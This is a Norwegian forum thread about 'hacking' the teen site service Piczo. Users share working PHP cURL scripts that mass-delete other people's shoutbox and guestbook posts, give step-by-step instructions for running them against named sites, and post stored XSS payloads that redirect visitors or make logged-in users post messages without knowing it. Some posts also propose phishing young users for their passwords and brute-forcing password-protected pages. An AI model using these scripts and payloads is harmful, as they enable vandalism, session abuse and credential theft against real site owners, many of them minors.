Du må være registrert og logget inn for å kunne legge ut innlegg på freak.no
X
LOGG INN
... eller du kan registrere deg nå
Dette nettstedet er avhengig av annonseinntekter for å holde driften og videre utvikling igang. Vi liker ikke reklame heller, men alternativene er ikke mange. Vær snill å vurder å slå av annonseblokkering, eller å abonnere på en reklamefri utgave av nettstedet.
  247 44618
isars's Avatar
Trådstarter
Håper dette hjalp litt. Vet det ble litt rotete, men jeg gjorde mitt beste
Vis hele sitatet...
Mange 1000 Takk for hjelpen Pression!

Dette var til stor hjelp for oss alle!.
er det mulig å slette bilder også?
det skulle jo ha vert en post for myspace også da hehe

ps: det funket fett og slette et innlegg
Sist endret av super; 8. april 2007 kl. 04:51.
Sitat av super
det skulle jo ha vert en post for myspace også da hehe

ps: det funket fett og slette et innlegg
Vis hele sitatet...
Kommer en "Month of Myspace Bugs" til sommeren.
Sitat av typisk
Kommer en "Month of Myspace Bugs" til sommeren.
Vis hele sitatet...
er det denne: http://momby.livejournal.com/
Sitat av typisk
Kommer en "Month of Myspace Bugs" til sommeren.
Vis hele sitatet...
Skulle ikke den være i april?
Hei! Har skrevet et script i PHP som sletter alle meldingene i en shoutbox.

Kode

<?php
//Piczo deleter 1.0
//Skrevet av Olav
//olav@megaspill.net
//URLen må være uten www. f.eks. slik: http://pic3.piczo.com/site/
$url="";
//Ikke endre under her
function hitForm($loginURL, $loginFields, $referer) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $loginURL);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_REFERER, $referer);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $loginFields);
$ret = curl_exec($ch);
curl_close($ch);
return $ret;
}
$server=substr($url, 0, 12);
$dlurl=$server."piczo.com/go/editpostapproval?plpid=";
$source=file_get_contents($url);
$sburl=$server.'piczo.com/go/shoutbox?';
$indexexplode1=explode('src="'.$sburl, $source);
$indexexplode2=explode('"', $indexexplode1[1]);
$sbsource=file_get_contents($sburl.$indexexplode2[0]);
$sbexplode1=explode('<div id="postView', $sbsource);
for ($start=0; $start < count($sbexplode1); $start++) {
	$sbexplode2=explode('"', $sbexplode1[$start]);
hitForm($dlurl.$sbexplode2[0], "plpid=".$sbexplode2[0]."&sv=y&popup=y&approvalstatus=delete", $dlurl.$sbexplode2[0]);
echo $sbexplode2[0].": Deleted.. <br>";
}
?>
Har bare testet det ut engang og da funket det hvertfall, men post bugs osv her slik at jeg kan fikse det.. For å slette meldingene har jeg brukt den metoden som er postet tidligere i tråden her.

Koden fungerer slik at siden du skriver inn url til blir hentet opp, så finner koden ut URL til selve shoutboxen. Dette gjøres ved bruk av php functionen explode(). Når den har funnet URLen til shoutboxen så henter den opp shoutboxen og den bruker da igjen explode() for å hente ut IDen til alle meldingene. Til slutt blir curl brukt for å sende meldinger til piczo om at den meldingen skal slettet slik at du skal slippe å trykke på delete osv...


EDIT: Du trenger libcurl for at dette scriptet skal fungere.. De fleste PHP installasjoner har libcurl fra før, men hvis du skulle få en error etc. når du prøver å kjøre scriptet så kan det være at du mangler libcurl..
http://curl.haxx.se/download.html
Sist endret av Olav; 8. april 2007 kl. 15:01.
Bare lage en crawler opp mot google så er alt i boks ? Lykke til, ser ut som den virker fint det du skrev.
Hehe... Har planer om å forbedre den litt ja, så bare kom med tilbakemeldinger og tips til hva jeg bør endre/legge til..

Testet den på den NFF piczo siden nå, og alle shoutbox meldingene forsvant..
isars's Avatar
Trådstarter
Dette er veldig bra Jobba, er ganske sikker på at du kommer til å få et par KP for dette.

Hadde vert veldig fint om du lagde en litt Guide step by step hvordan man gjør dette isteden for bare å poste
EDIT: Du trenger libcurl for at dette scriptet skal fungere..
http://curl.haxx.se/download.html
Vis hele sitatet...
Ellers veldig bra jobba Olav
Prøver igjen.. er det mulig å slette bilder også?
Vell, libcurl har jeg aldri lagt inn selv da det alltid har fulgt med PHP når jeg har lagt det inn. Jeg vil også tro at de fleste PHP installasjonen har libcurl, men det var bare hvis man ikke fikk det til å fungere pga. feil meldinger med curl etc..

Step-by-step tutorial for å bruke scriptet:
Finn siden du vil hacke, her bruker jeg NFF sin piczo side som et eksempel.
1. Når du kommer inn på siden så vil URLen se slik ut: http://www.nff-hax.piczo.com/?cr=6&rfm=y, men du trenger en URL som er mere slik: http://pic3.piczo.com/site/.
For å finne den så trykker du på en av de andre sidene for så å trykke deg tilbake til "Hjem" igjen. På nff-hax får du da denne URLen: http://pic6.piczo.com/NFF-HAX/?g=1
Merk: Du skal skrive inn URLen til hvor shoutboxen ligger, alltså ikke nødvendigvis index-siden.

2. Endre $url=""; til $url="http://pic6.piczo.com/NFF-HAX/?g=1";

3. Last opp .php fila til en server som har støtte for PHP også bruk nettleseren til å gå til fila.. Det er alt Nå vil alle shoutbox kommentarene forsvinne..

Og som jeg sa ista så kom med kommentarer og tips til scriptet. Kom også med ideer for ting jeg bør legge til etc..
Og som jeg sa ista så kom med kommentarer og tips til scriptet. Kom også med ideer for ting jeg bør legge til etc..
Vis hele sitatet...
Enkel GUI, f.eks en form som de kan fylle ut url'n med.
Har startet på en ny versjon med GUI nå. På den kommer det også til å bli mulighet for å se alle meldingene i shoutboxen, for så å slette bare en isteden for alle, men også en knapp for å slette alle meldingene.
Den koden for å få bildene til å fly rundt. Hvordan kan jeg legge den inn slik at de andre ser det?

Konge tråd Nå kan vi noobs få leke lh337 hax0rz
Har nå laget en GUI versjon, hvor du også har muligheten til å slette en og en post.

Du finner kilden her:
http://paste.uni.cc/14388
eller du kan laste ned php filen i en zip fil.

Her er noen printscreen av det:
http://bildr.no/thumb/53970.jpeg
http://bildr.no/thumb/53971.jpeg
http://bildr.no/thumb/53972.jpeg
http://bildr.no/thumb/53974.jpeg
Sist endret av Olav; 8. april 2007 kl. 16:18.
Sitat av Olav

3. Last opp .php fila til en server som har støtte for PHP også bruk nettleseren til å gå til fila.. Det er alt Nå vil alle shoutbox kommentarene forsvinne..
Vis hele sitatet...

Hva mener du med at jeg skal laste .php fila til en server som har støtte for PHP? kan du vise hvordan?

Beklager, men er litt blank på det område når det gjelder PHP, server og slikt.
Sist endret av Freak_XP; 8. april 2007 kl. 17:06.
Hei.

Om du har en php server, så putter du inn en fil som du kaller "phpinfo.php".
I phpinfo.php skriver du:
<?
phpinfo();
?>

Gå til phpinfo.php via internett, og søk etter cURL. Har serveren cURL kan du bruke scriptet Olav skrev. Merk at du også kan laste ned og installere XAMPP *lokalt* og skru på cURL der, som tar toppen 3 minutter.
Søk etter xampp på forumet så finner du en stor guide.
dere kan teste det php-scriptet til Olav her, siden jeg lastet det opp på min server. Jeg har ikke prøvd det enda.
I see you...
NAPse's Avatar
Jeg får bare opp error, jeg.

Fatal error: Call to undefined function curl_init() in /web/www/frac/users/m/markusiggy/piczo/index.php on line 14
Det betyr at du ikke har cURL. Du kan laste ned curllib her:
http://curl.haxx.se/download.html

Kjører du en linux server så kan du sikkert laste det ned og installere gjennom pakkebehandleren (apt-get) osv..
Får du den curl erroren så er det mest sannsynlig for at du ikke har cURL installert..

Til de som får det til å fungere: Kom gjerne med tips på ting jeg skal endre/legge til i scriptet..
må si du er flink:P jeg lasta ned curl på den siden...men jeg vetikke hva jeg skal gjøre med den zip mappa?:P er masse rart i den

curl-7.16.1.tar.gz lasta ned den
Bare et spørsmål til det denne tråden starter med: Kan man bare slette meldinger i gjestebøkene på piczo? Senest i morges kunne jeg også redigere innlegg ved hjelp av javascript, men det fungerer plutselig ikke mer :S
isars's Avatar
Trådstarter
Noen som har lyst å lage et script som klarer å slette alle meldingene i Gjesteboken også?
Hvorfor er det ingen som kan legge det på sin egen server? Så kan de gi oss link, så det fuker... Fordi serveren min har ikke støtte for curl (Fordi one.com støtter ikke curl)
EDIT: ops. for sent ute...;S
Sist endret av RampLest; 8. april 2007 kl. 18:29.
Trigonoceps occipita
vidarlo's Avatar
Donor
Sitat av RampLest
Hvorfor er det ingen som kan legge det på sin egen server? Så kan de gi oss link, så det fuker... Fordi serveren min har ikke støtte for curl (Fordi one.com støtter ikke curl)
EDIT: ops. for sent ute...;S
Vis hele sitatet...
Fordi eg tipper det bryter rimelig brått mot Acceptable User Policy hos dei fleste hoster og ISP'er.

Sånn bare for å ha nevnt det.
noen som har funnet ut hvordan man kommer inn på passordbeskytta sider?
håper noen greier det da! :9
Trigonoceps occipita
vidarlo's Avatar
Donor
Sitat av ppfreak
håper noen greier det da! :9
Vis hele sitatet...
Jævlig greit at det sitter ti stykker og driver kollektivrunk for å hjelpe oss andre da...

Seriøst. Passordbeskyttelsen er server-side, og det er ingen ting som tyder på at dei har bomma der.

Enklaste er nok social engineering, send e-post fra picozo.com og sei at du trenger passordet for å utføre velikehold, så vil 9/10 13 år gamle jenter gi deg det... Kva som er interessant med å ha det derimot...
Ser ut som dere har kommet ganske langt her, men kan noen gi oss en lett guide hvodan du hacker passord-beskyttet sider?
Er det mulig, kng666? vidarlo har jo nettopp skrevet en post om akkurat det. Social engineering er beste måte å få et slikt piczo-passord på, men hva skal man med det?
Jeg vil bare skyte inn et lite forslag: Hva med å samle alle de forskjellige hackene på selve NFF-HAX-piczo sida, så slipper man stresset med å bla gjennom alle sidene for å finne det man trenger?
Sist endret av veslefreak; 8. april 2007 kl. 19:48.
Det er allerede kommet nesten 110 innlegg her, og begynner å bli slitsomt med alle som maser om samme ting. Jeg hadde håpet dette kunne bli en nyttig tråd hvor man lett kan finne informasjon om å utnytte bugs hos piczo, men tipper de aller færreste, da inkludert meg, gidder å bla igjennom 6 sider med masse tull.

Håper noen kan rydde litt i denne tråden, så det blir lettere å finne nyttig informasjon.

Så litt cred til Olav: La scriptet ditt på egen server, og funker fjell å slette shoutbox innlegg. Tusen takk for koden
isars's Avatar
Trådstarter
Jeg skrev helt i starten av denne posten at jeg ikke ville ha så mye rot, så jeg venter egentlig bare på at noen moderatorer skal gidde å fixe det!

Beklager for alt rotet det har blitt her! er sterk motstander av det selv.
Er passordbeskytta sider _helt_ vanntette?
Funker det ikke å bruteforce sidene med et program eller noe sånt?
Vel, tenkte jeg med det samme kunne skru sammen en video av hvordan man "hacker" denna gjestebok greia.
http://www.youtube.com/watch?v=359t5Bmhp_w
Er ganske dårlig kvalitet på bildene, men ser ut til å være forståelig.

btw: noen som kan forklare for meg hva curl er?
forsker litt på det i mellomtiden...
Sist endret av Espen`; 8. april 2007 kl. 20:53.
Prøver igjen; Seinest i dag tidlig var det mulig å endre på innlegget i piczo-gjestebøker, men nå fungerer det merksnodig nok ikke.

Anyone?
fordi kanskje piczo har opdaget det
Sitat av general9999
fordi kanskje piczo har opdaget det
Vis hele sitatet...
tror ikkje det, eg klarer det fortsatt
Sitat av isars
PICZO HACKS

J
1. Gå til Gjesteboken høyreklikk et random sted på siden å velg "Vis Kilde"
2. Hold nede CTRL+B nå får du opp et søke vindu hvor du skriver noe av teksten fra innlegget/kommentaren fra gjesteboka du vil ha slettet.


[COLOR=Red]LINK:[/COLOR] http://www.youtube.com/watch?v=yVseY...7E8CAE&index=5
Vis hele sitatet...

Bra guide! men du skal trykke Ctrl + f ikke b fant jeg ut.
Sitat av Torhv
Bra guide! men du skal trykke Ctrl + f ikke b fant jeg ut.
Vis hele sitatet...
Kommer ann på om du bruker ff eller opera.
oki, denne tråden blir litt off-topic nå..

kan noen si meg hvor eg skal paste koden til å få bildene til å "fly" rundt på skjermen??.. finner ikke ut av det.. ikke lokalt, men public

Kode

<script> javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.images; DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=Math.sin(R*x1+i*x2+x3)*x4+x5; DIS.top=Math.cos(R*y1+i*y2+y3)*y4+y5}R++   }setInterval('A()',5); void(0); </script>
Jeg får ikke åpnet piczo sidene i IE7 lengre, må bruke Opera :O
isars's Avatar
Trådstarter
Sitat av detos

Kode

<script> javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.images; DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=Math.sin(R*x1+i*x2+x3)*x4+x5; DIS.top=Math.cos(R*y1+i*y2+y3)*y4+y5}R++   }setInterval('A()',5); void(0); </script>
Vis hele sitatet...
[COLOR=Red]Fint, der fant du også svaret du ville ha selv detos! HeHe![/COLOR]
har lest gjennom denne tråden noen ganger nå så trur ikke at denne er her:
finn noen som har Comment Board (er inne på Profile Page) velg [Add Message] og skriv inn

Kode

<script>alert("super was her")</script>
da kommer det en boks opp med "super was her" (den kan du forandre som du selv vil),
og koden vil ikke stå i Comment Board

en annen ting du kan skrive inn i Comment Board er:

Kode

<script>window.location=http://www.google.com/</script>
denne skulle få Comment Board iframe redirect til google.com men jeg fikk ikke den til og virke?

begge disse har jeg hentet fra denne videoen
Hei!

Da er jeg ferdig med scriptet for å slette fra gjestebøker. Funker nokså likt som det som sletter fra shoutboxen bare at det er fra gjesteboken ...

Slet en stund med denne før jeg til slutt fant ut at piczo krever cookies for at du skal få slette meldingene. Det betyr at du må lage en .txt fil med navnet cookies.txt som du legger i samme mappe som scriptet. Kjører du scriptet på linux så må du også chmode filen til 0777.

Her er scriptet:

Kode

<?php
//Piczo deleter 1.0
//Skrevet av Olav
//olav@megaspill.net
//URLen må være uten www. f.eks. slik: http://pic3.piczo.com/site/
$url="";
$server=substr($url, 0, 12);
$dlurl=$server."piczo.com/go/editpost?submit=Delete&plpid=";
function delete($dlurl, $url){
	$ch = curl_init();
	curl_setopt($ch, CURLOPT_COOKIEJAR, "cookies.txt");
	curl_setopt($ch, CURLOPT_COOKIEFILE, "cookies.txt");
	curl_setopt($ch, CURLOPT_URL, $dlurl);
	curl_setopt($ch, CURLOPT_POST, 1);
	curl_setopt($ch, CURLOPT_REFERER, $url);
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	$ret = curl_exec($ch);
	curl_close($ch);
	return $ret;
}
$source=file_get_contents($url);
$explode1=explode('<div id="postGbView', $source);
for ($start=1; $start < count($explode1); $start++) {
	$explode2= explode('"', $explode1[$start]);
    delete($dlurl.$explode2[0], $url);
	echo $explode2[0].": Slettet.. <br>";
}
?>
Skal se om jeg får satt sammen en GUI versjon imorgen..
Fant dette innepå her
Okay, the easiest things to mess up on piczo sites are the shoutboxes, guestbook, and comment boards.

Shoutboxes and guestbooks can both be easily altered (as in deleting other people's posts and viewing their ip address in 'admin' mode).

Comment boards too, but comment boards are also susceptible to XSS (Cross site scripting), we can stick our own code into our messages and have the code carried out on the site.

Now..let's think...who normally uses Piczo? Logged in Piczo users. Now, we can make them redirect to an URL that will change their site (even cancel it). And so on.

For example:
<SCRIPT LANGUAGE = "JavaScript">window.location="URL TO REDIRECT TO";</SCRIPT>

Or if you just want to test this out with a pop up box:
<SCRIPT LANGUAGE = "JavaScript">alert("TEXT GOES HERE");</SCRIPT>

And this code will post messages as other people when they view the comment board:
<SCRIPT LANGUAGE = "JavaScript"> window.location="http://pic6.piczo.com/go/commentonboard?cb=6258415&cbo=3928113&commentername=Santa&te xt=awwww you were hacked";</SCRIPT>

S in that code, just replace the pic# server number with that of the sit you want to post to, then replace the cb and cbo codes (and the name and text obviously). This way, when anyone logged in Piczo user visits the site, or views the page with the comment board on it, they will unwittingly post thousand of messages.
Vis hele sitatet...
Gidder ikke å oversette...